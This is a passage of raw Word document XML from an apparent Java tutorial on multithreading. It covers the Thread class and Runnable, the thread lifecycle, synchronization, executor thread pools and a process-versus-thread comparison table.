          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5256FC"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w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a subset of concurrency where tasks are actually executed simultaneously, typically on multiple CPU cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F73C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Benefits of Multithreading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2179FE33"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etter CPU Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multithreading allows multiple CPU cores to be utilized, leading to better performance, especially for CPU-intensive tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6019C111"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Improved Application Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When threads run concurrently, the program can perform more work in less time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710A182"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Faster I/O Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multithreading can help in performing tasks like file reading/writing, network calls, etc., in parallel, reducing overall latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410ED7E"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esponsive UI</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In GUI applications, multithreading helps keep the interface responsive by performing heavy computations or network operations in the background while the UI thread handles user interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0873B88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How Multithreading Works in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A6D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ava provides two main ways to create and manage threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC4826"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Extending the Thread Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43288EA1"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You can create a custom thread by extending the Thread class and overriding the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4928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Thread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A5147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620DE1A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4996C31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hread is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C854F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B70D70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2F724ED" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E50871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225A7164"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02BCD77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Thread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A34E7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the run() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110621B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33477AD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3F4C89"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Implementing the Runnable Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F680ED8"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lternatively, you can implement the Runnable interface and pass it to a Thread object. This is preferred over extending the Thread class, as Java supports multiple interface implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E3D9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Runnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5DFB37"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2F7B1E4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21459DEE"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Runnable thread is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C86AE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BA300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6ED07B84" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1F590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00A77F45"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34CA3B1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Runnable myRunnable = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A47C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 thread = new Thread(myRunnable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AFD7B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run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3A82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F85BE3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28E062EF"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Lifecycle of a Thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434041D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 thread in Java goes through several states during its lifetime:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1329C459"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New</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread is in this state when it is created but has not yet started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E4081"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unnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After calling start(), the thread becomes runnable. It can be running or waiting for CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDD7B36"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locked</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread enters the blocked state when it wants to access a resource that another thread is using (e.g., waiting for a lock).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CCCB77"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Waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread enters this state when it is waiting for another thread to perform a particular action (e.g., wait(), join()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A67004"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erminated</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread enters this state once its run() method has finished executing or when it is stopped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542436D9"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Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C59042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In multithreaded applications, multiple threads may attempt to access shared resources, potentially causing data inconsistency or corruption. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that only one thread can access a resource at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01973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Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1348F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rivate int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3DF3D" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F7EC05"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 Synchronized method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562652E2"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ynchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746847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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075587D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7489060" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D7B4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int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F28F6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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177DFA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ECCE1C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14FFCCF8"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Pools (Executors):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346708D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Managing threads manually can be challenging, especially when there are many threads. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Executor framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simplifies thread management by providing thread pools. These pools manage a collection of worker threads for executing tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB8D5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ervice;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9AC3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5014E3" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3E4C1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ThreadPoolExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FAD3E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7BA0C0F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ervice executor = Executors.newFixedThreadPool(3);  // Create a pool of 3 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61181228" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737D728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2EA08C40"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1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603144F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D30CAFE" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E862B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520DF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2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DA3A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1AFD7A" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="137B0EA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2EF0F7C"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3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583205E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21A34EF" w14:textId="77777777" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126D748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hutdown();  // Shutdown the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1BAE9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04B68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DA7E2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Methods of Thread Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512691B5"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tart(): Starts the thread and invokes its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB0AA0A"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leep(long millis): Pauses the current thread for the specified time in milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477820F1"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oin(): Makes the calling thread wait until the thread on which it's called has finished executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66949930"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nterrupt(): Interrupts a thread that is either sleeping or waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5A5E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mmon Multithreading Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A2BC4"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ace Conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Occur when multiple threads access shared data concurrently, causing unpredictable results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EDD57F"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Deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Happens when two or more threads are blocked forever because they are waiting for each other to release resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46243411"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 Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Occurs when one or more threads are blocked indefinitely, not getting enough CPU time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE3C3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nclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8964EC"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s a powerful concept for improving performance and responsiveness in Java applications, especially in CPU-bound or I/O-bound tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F18248"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By using Java’s threading mechanisms, you can run tasks concurrently, ensuring optimal resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201FE81D"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Managing threads requires careful handling of synchronization, race conditions, and deadlocks to ensure the correctness of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA7672" w14:textId="3DD2592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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BB16F" w14:textId="61F3CADB" w:rsidR="006E1A00" w:rsidRPr="00CE4B95" w:rsidRDefault="007F64E6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="_Toc197867484"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="006E1A00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between Process and Thread?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
    </w:p>
    <w:p w14:paraId="13B7ECD9" w14:textId="06F8A71A" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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 xml:space="preserve">A </w:t>
      </w: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xml:space="preserve"> and a </w:t>
      </w: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333"/>
        <w:gridCol w:w="4257"/>
      </w:tblGrid>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="7782DA57" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1205EED7"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A875D1"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Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41BC7FE2"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Thread</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="6E68FD26" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FF224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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63D2121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thread is a lightweight sub-process that shares the same memory space with other threads of the same process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="36C9CCB7" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CC4952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Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9B379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memory space (stack, heap, etc.), so processes do not share memory with each other.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59AF57D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same memory space of the parent process, meaning they share data and resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="41377298" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76BF5AC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reation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2609628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reating a process is relatively expensive in terms of system resources, as it requires allocating separate memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5115826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lighter and quicker to create than processes, as they share the memory space of their parent process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="1D3195E2" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07340345"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mmunication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716E1D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can communicate easily and quickly because they share the same memory space.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="77614E00" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="124FC0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Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18967184"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higher overhead since each one has its own memory space, file descriptors, and resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8D8CD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have lower overhead because they share memory and other resources with their parent process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="2EEC5631" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFA48C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Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC751B7"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runs independently and does not affect the execution of other processes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F96955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run concurrently and can affect each other due to shared memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="1B83A56B" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB36DF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Resource Allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D8F7B1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allocated resources such as memory, file handles, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34722F0C"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resources allocated to the parent process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="4863ECEB" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
